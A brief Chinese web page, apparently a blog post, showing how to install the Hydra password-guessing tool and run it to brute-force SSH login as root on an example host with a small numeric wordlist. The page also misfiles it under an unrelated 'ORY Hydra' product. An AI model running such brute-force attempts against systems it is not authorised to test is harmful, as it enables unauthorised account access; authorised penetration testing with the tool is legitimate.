当前位置: 首页 > 工具软件 > ORY Hydra > 使用案例 >

hydra 安装和使用

朱博实
2023-12-01

udo add-apt-repository ppa:pi-rho/security

sudo apt-get update

sudo apt-get install hydra

 

hydra -l root -P pwd.txt -t 2 ssh://2.2.2.2

 

pwd.txt

1
12
123
1234
12345
123456

 

 类似资料: